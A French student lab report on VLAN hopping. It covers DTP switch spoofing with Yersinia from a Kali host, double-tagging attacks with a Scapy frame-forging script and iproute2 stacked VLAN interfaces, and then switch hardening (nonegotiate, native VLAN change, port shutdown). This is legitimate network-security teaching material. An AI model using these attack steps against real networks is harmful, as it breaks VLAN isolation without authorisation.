\newpage
# Attaques et protection contre le VLAN Hopping
## Switch spoofing DTP
### DTP : Fonctionnement de base
1. Entrez la commande ci-dessous sur S1 et S2
```
show interface G0/0 switchport
```
2.
- Quel champ indique le mode de fonctionnement (trunk ou access) du port G0/0 ?
- C'est le champ `Operational Mode`
- A quelle valeur est-elle sur les switchs S1 et S2 ?
- ```
Operational Mode: static access
```
- Est-ce que le switch S2 a des interfaces en mode trunk ? Utilisez la commande `sh interface trunk` pour le vérifier.
- Non, le switch S2 n'a aucune interface en mode trunk.
3. Capturez les messages DTP qui circulent entre S1 et S2.
- Quelle est la destination des messages ?
- CDP/VTP/DTP/PAgP/UDLD --- 0**1**:00:0c:cc:cc:cc
- De quel type de communication s’agit-t-il ? (Unicast/Multicast/Broadcast ?)
- Multicast, car le bit de poids faible de l'octet de poids fort de
l'adresse est posé à 1 (démarqué en gras ci-dessus).
4. Sur la même adresse de destination circulent d’autres protocoles que DTP, citez-les et donnez-en une brêve description ?
- Le seul protocole autre protocole que DTP dont le paquets portent la même
adresse de destination est CDP. CDP (_Cisco Discovery Protocol_) est un protocole
permettant la collecte d'informations sur les appareils voisins qui ont une
connexion directe avec le switch en question. Ce protocole permet d'obtenir
des informations non-seulement sur le hardware, mais aussi sur le software
ainsi que le nom que porte l'appareil en question.
- A partir de la capture Wireshark, décrivez comment sont encapsulés ces messages sur Ethernet[^1] ?
- Les paquets CDP sont encapsulés dans le champ "données utiles" de la
partie LLC (_Logical Link Control_) d'une trame Ethernet. Cette sous-couche
fait partie de la couche 2 du modèle OSI (couche liaison) et elle permet
de fiabiliser le protocole MAC par un contrôle d'erreur est un controle
de flux.
[^1]: [Contrôle de la liaison logique](https://fr.wikipedia.org/wiki/Contr%C3%B4le_de_la_liaison_logique)
### Attaque du DTP avec `Yersinia`
1. Configurez le VLAN 10 sur S1 et S2, avec G0/1 en mode access et G0/0 en mode trunk.
- Configuration de l'interface `GigabitEthernet 0/0` en mode `trunk` (S1 et S2) :
```
Switch>en
Switch#conf t
Switch(config)#vlan 10
Switch(config-vlan)#exit
Switch(config)#interface GigabitEthernet 0/0
Switch(config-if)#switchport trunk encapsulation dot1q
Switch(config-if)#switchport mode trunk
Switch(config-if)#no shut
Switch(config-if)#end
```
\newpage
- Configuration de l'interface `GigabitEthernet 0/1` en mode `access` (S1 et S2) :
```
Switch>en
Switch#conf t
Switch(config)#interface GigabitEthernet 0/1
Switch(config-if)#switchport access vlan 10
Switch(config-if)#no shut
Switch(config-if)#end
```
2. Configurez l’adresse IP de H1 et H2 à 10.0.0.1/24 et 10.0.0.2/24 respectivement.
- H1 :
```bash
hostnamectl set-hostname H1
ip addr add 10.0.0.1/24 dev eth0
ip link set up dev eth0
```
- H2 :
```bash
hostnamectl set-hostname H2
ip addr add 10.0.0.2/24 dev eth0
ip link set up dev eth0
```
3.
- Configurez l’adresse IP de `kali-linux-1` à 10.0.0.3/24.
```bash
sudo ip addr add 10.0.0.3/24 dev eth0
sudo ip link set up dev eth0
```
- Arrivez-vous à pinger H1 et H2 depuis cette machine ? Pourquoi ?
- On n'arrive pas à pinger H1 et H2 depuis `kali-linux-1` car cette
machine se trouve en dehors du VLAN 10 suite au fait qu'elle est reliée
au switch S1 par l'interface `GigabitEthernet 0/2`.
- Enlevez cette IP de `kali-linux-1` :
```bash
sudo ip addr del 10.0.0.3/24 dev eth0
sudo ip link set down dev eth0
```
4. Quel est la valeur de `Operational Mode` du port G0/2 sur le switch S1 ?
- Afin d'obtenir cette information il faut exécuter la commande suivante :
```
show interface GigabitEthernet 0/2 switchport
```
Sa valeur est : `static access`.
5. Effectuez maintenant une attaque à distance depuis la machine Kali en
exécutant la commande `sudo yersinia -I`. Selectionnez, avec la touche `g`, les
attaques de type `Dynamic trunking Protocol`. Appuyer sur `x`, puis `1` pour
`Enable trunking`.
6. Quel est à présent la valeur de Operational Mode du port G0/2 sur le switch
S1 ? Pourquoi ?
- À présent la valeur du champ `Operational Mode` est `trunk`. Grâce à
l'outil `yersinia`, on a pu forger un paquet DTP qui nous a permis de nous
faire passer pour switch qui désire établir un trunk avec S1. En envoyant
ce paquet sur l'interface GigabitEthernet 0/2 de S1, on a pu la faire basculer
en mode `trunk`.
7. Il est a présent très simple pour la machine Kali de rejoindre le vlan 10.
Rajoutez-y simplement une interface qui tagge tout les paquets avec le numéro
de vlan 10 par la commande suivante :
```bash
ip link add link eth0 name eth0.10 type vlan id 10
```
8.
- Configurez eth0.10 avec l’IP 10.0.0.3/24.
```bash
sudo ip addr add 10.0.0.3/24 dev eth0.10
sudo ip link set up dev eth0.10
```
- Arrivez-vous à pinger 10.0.0.1 et 10.0.0.2 ? Expliquez pourquoi ?
- Oui, à présent nous arrivons à pinger H1 et H2 car nous nous retrouvons
à présent sur le VLAN 10 qui relie H1 à H2.
### Sécurisation des switches
1. Sécurisez l’ensemble des ports des switches S1 et S2 de façon à ce qu’aucune
attaque ne puisse avoir lieu sur les ports restant des switchs qui
n’appartiennent pas au VLAN 10.
- `GigabitEthernet 0/2` de S1 :
```
Switch>en
Switch#conf t
Switch(config)#interface GigabitEthernet 0/2
Switch(config-if)#switchport mode access
Switch(config-if)#no shut
Switch(config-if)#end
```
- `GigabitEthernet 0/0` de S1 et S2:
```
Switch>en
Switch#conf t
Switch(config)#interface GigabitEthernet 0/0
Switch(config-if)#switchport trunk encapsulation dot1q
Switch(config-if)#switchport mode trunk
Switch(config-if)#switchport nonegotiate
Switch(config-if)#no shut
Switch(config-if)#end
```
## VLAN Hopping sur le VLAN natif
### Révision VLAN
1. Pourquoi existe-t-il un VLAN natif ? Autrement dit, quelle est son utilité ?
- L'utilité d'un VLAN natif est de permettre la compatibilité avec des appareils
réseaux plus anciens qui ne permettent pas la segmentation en VLAN.
2. Configurez S1 et S2, ainsi que l’adresse IP de H1,H2, H3 et H4 pour que les
VLAN 100 et 200 indiqués sur la topologie soient actifs. Vous conservez le VLAN
natif à sa valeur initiale.
- S1 :
```cisco
================ VLAN ================
Switch>en
Switch#conf t
Switch(config)#hostname S1
S1(config)#vlan 100
S1(config-vlan)#exit
S1(config)#vlan 200
S1(config-vlan)#exit
=============== Gi0/0 ================
S1(config)#interface GigabitEthernet 0/0
S1(config-if)#switchport trunk encapsulation dot1q
S1(config-if)#switchport mode trunk
S1(config-if)#no shut
S1(config-if)#exit
=============== Gi0/1 ================
S1(config)#interface GigabitEthernet 0/1
S1(config-if)#switchport access vlan 100
S1(config-if)#no shut
S1(config-if)#exit
=============== Gi0/2 ================
S1(config)#interface GigabitEthernet 0/2
S1(config-if)#switchport access vlan 200
S1(config-if)#no shut
S1(config-if)#exit
```
- S2 :
```cisco
================ VLAN ================
Switch>en
Switch#conf t
Switch(config)#hostname S2
S2(config)#vlan 100
S2(config-vlan)#exit
S2(config)#vlan 200
S2(config-vlan)#exit
=============== Gi0/0 ================
S2(config)#interface GigabitEthernet 0/0
S2(config-if)#switchport trunk encapsulation dot1q
S2(config-if)#switchport mode trunk
S2(config-if)#no shut
S2(config-if)#exit
=============== Gi0/1 ================
S2(config)#interface GigabitEthernet 0/1
S2(config-if)#switchport access vlan 100
S2(config-if)#no shut
S2(config-if)#exit
=============== Gi0/2 ================
S2(config)#interface GigabitEthernet 0/2
S2(config-if)#switchport access vlan 200
S2(config-if)#no shut
S2(config-if)#exit
```
- H1 :
```bash
ip addr add 10.0.0.1/24 dev eth0
ip link set up dev eth0
```
- H2 :
```bash
ip addr add 10.0.0.2/24 dev eth0
ip link set up dev eth0
```
- H3 :
```bash
ip addr add 10.1.0.3/24 dev eth0
ip link set up dev eth0
```
- H4 :
```bash
ip addr add 10.1.0.4/24 dev eth0
ip link set up dev eth0
```
3. Montrez, par des captures d’écrans, que les VLAN 100 et 200 sont
effectivement isolés en assignant temporairement une IP du subnet du VLAN 100 à
la machine `kali-linux-1` et en essayant de pinger sans succès H1 et H2.
- `kali-linux-1` :
```bash
sudo ip addr add 10.0.0.3/24 dev eth0
```
{width=80%}
{width=80%}
\newpage
- Démontrez, aussi avec une capture d’écran, le cas inverse en déplaçant
temporairement `kali-linux-1` dans le vlan 100 est en relançant le ping, cette
fois-ci avec succès.
- S1 :
```
=============== Gi0/3 ================
S1(config)#interface GigabitEthernet 0/3
S1(config-if)#switchport access vlan 100
S1(config-if)#no shut
S1(config-if)#exit
```
### Double tagging `Scapy`
Ci-dessous se trouve le script grâce auquel nous pourrons effectuer une attaque
par _double-tagging_.
```python
from scapy.all import *
sendp(Ether(dst='ff:ff:ff:ff:ff:ff', src='00:01:02:03:04:05')/ \
Dot1Q(vlan=1)/Dot1Q(vlan=100)/ \
IP(dst='10.0.0.1', src='10.0.0.3')/ICMP(),iface="eth0")
```
Premièrement il faut enlever l'interface `GigabitEthernet 0/3` de S1 du VLAN 100 :
```
=============== Gi0/3 ================
S1(config)#interface GigabitEthernet 0/3
S1(config-if)#no switchport access vlan 100
S1(config-if)#no shut
S1(config-if)#exit
```
Puis il est nécessaire de retirer l'adresse IP attribué à `kali-linux-1` sur
l'interface `eth0` :
```bash
sudo ip addr del 10.0.0.3/24 dev eth0
```
1. A partir du script fourni ci-dessus, exécutez une attaque par double-tagging.
```bash
sudo python3 <nom_attribué_au_script>.py
```
2. Effectuer une capture Wireshark sur le lien entre S1 et S2, sur le lien
entre H2 et S2 et sur le lien entre H2 et S1. Où voyez-vous le trafic circuler ?
- Sur les captures ci-dessous (demarquée en vert), on voit bien que le
paquet circule effectivement sur le lien S1 $\Leftrightarrow$ S2 (capture
de gauche), ainsi que sur le lien S2 $\Leftrightarrow$ H2 (capture de
droite).
3. Quelle est la valeur du tag 802.1Q restant sur la trame venant de
`kali-linux-1` après être traitée par S1 ? Expliquez pourquoi ?
- La valeur du tag 802.1Q est égale à 0x64 = 100. Dans le format du tag
802.1Q, les 12 derniers bits correspondent au VID (_VLAN Identifier_). Par
conséquent la valeur de ce champ correspond au VLAN auquel appartient la
trame. Dans notre cas, la trame circule effectivement sur le VLAN 100, d'où
la valeur du VID.
4. Est-ce le switch a moyen de vérifier que le tag 802.1Q présent sur la trame
provenant de `kali-linux-1` est légitime ? Pourquoi ?
- Le switch n'a pas moyen de vérifier que la trame est légitime car dans
l'entête du tag 802.1Q, il n'y a aucun champ qui permet de vérifier
"l'authenticité" de la source.
5. Pourquoi la trame arrive à passer sur le lien vers H2 mais pas sur le lien
vers H1 ?
- La raison pour laquelle la trame n'est pas visible sur le lien H1
$\Leftrightarrow$ S1 est que, quand le paquet arrive initialement sur S1,
il va retirer le premier tag dont le VID est égal à 1, par conséquent ce
n'est que le second switch qui verra le valeur du VID du deuxième tag
correspondant au VLAN attaqué. Vu que H1 est relié à S1, c'est pour cette
raison qu'on ne voit pas la trame sur ce lien.
6. Est-ce qu’un Firewall qui filtrerait les paquets en couche 3 aiderait à
mitiger cette attaque ? Pourquoi ?
- Non, un firewall ne permettrait pas de mitiger cette attaque car une trame
Ethernet est du niveau 2, par conséquent il ne pourrait pas filtrer ce
paquet.
### Double tagging `iproute2`
Ci-dessous, se trouvent les commandes utilisées afin de configurer les 2
interfaces virtuelles nécéssaires à l'implémentation de l'attaque par "double-
tagging" :
```bash
sudo ip link add link eth0 name eth0.1 type vlan id 1
sudo ip link add link eth0.1 name eth0.1.100 type vlan id 100
sudo ip addr add 10.0.0.3/24 dev eth0.1.100
```
Par la suite, nous avons effectué un ping depuis `kali-linux-1` jusqu'à H2
(10.0.0.2) se situant sur le VLAN 100 avec la commande suivante qui permet
de spécifier l'interface à partir de laquelle envoyer le message ICMP :
```bash
ping -I eth0.1.100 10.0.0.2
```
Sur l'image ci-dessous, nous pouvons effectivement remarquer que notre paquet
a réussi à atteindre H2 depuis `kali-linux-1` car notre paquet ICMP contenait
2 tags (1 pour le VLAN 1 qui est retiré lors de l'arrivée sur le switch S1, puis
le tag restant permet d'atteindre un hôte se situant sur le VLAN du second tag,
en l'occurrence H2 se situant sur le VLAN 100).
### Sécurisation des switches
1. Renommer les VLANs (ne pas avoir de nom du style VLAN0100) :
- VLAN 100 $\Rightarrow$ H1-H2 :
```
S1#vlan database
% Warning: It is recommended to configure VLAN from config mode,
as VLAN database mode is being deprecated. Please consult user
documentation for configuring VTP/VLAN in config mode.
S1(vlan)#vlan 100 name H1-H2
VLAN 100 modified:
Name: H1-H2
S1(vlan)#exit
APPLY completed.
Exiting....
```
- VLAN 200 $\Rightarrow$ H3-H4 :
```
S1#vlan database
% Warning: It is recommended to configure VLAN from config mode,
as VLAN database mode is being deprecated. Please consult user
documentation for configuring VTP/VLAN in config mode.
S1(vlan)#vlan 200 name H3-H4
VLAN 200 modified:
Name: H3-H4
S1(vlan)#exit
APPLY completed.
Exiting....
```
2. Désactivation de l'interface GigabitEthernet0/3 sur S1 :
- Commande :
```
S1#conf t
Enter configuration commands, one per line. End with CNTL/Z.
S1(config)#interface GigabitEthernet 0/3
S1(config-if)#shutdown
```
- Vérification avec `sh interface GigabitEthernet0/3 switchport` :
```
Operational Mode: down
```
3. Désactivation de DTP à l'aide de la commande `switchport nonegotiate` (du
côté de S1 ainsi que S2) :
- Commandes à effectuer afin de passer l'interface `GigabitEthernet0/0` en
`nonegotiate` :
```
S1#conf t
S1(config)#interface GigabitEthernet 0/0
S1(config-if)#switchport trunk encapsulation dot1q
S1(config-if)#switchport mode trunk
S1(config-if)#switchport nonegotiate
S1(config-if)#no shut
```
- Vérification avec `sh interface GigabitEthernet0/0 switchport` :
```
Negotiation of Trunking: Off
```
4. Changement de la valeur du VLAN natif (1 $\Rightarrow$ 999) sur S1 et S2 :
- Commandes à effectuer sur S1 et S2 :
```
S1#conf t
S1(config)#interface GigabitEthernet 0/0
S1(config-if)#switchport trunk native vlan 999
S1(config-if)#no shut
```
- Vérification avec `sh interface trunk` (ex: sur S2) :
```
S2#sh interface trunk
Port Mode Encapsulation Status Native vlan
Gi0/0 on 802.1q trunking 999
Port Vlans allowed on trunk
Gi0/0 1-4094
Port Vlans allowed and active in management domain
Gi0/0 1,100,200
Port Vlans in spanning tree forwarding state and not pruned
Gi0/0 1,100,200
S2#
```
5. Vérification des mesures de sécurité mise en place :
- Sur l'image ci-dessous on peut observer une tentative d'attaque grâce à
`scapy` après avoir mis en place les mesures de sécurité citées ci-dessus.
Nous pouvons effectivement remarquer que le paquet ICMP ne traverse plus le
switch S2 comme il le fesait auparavant.
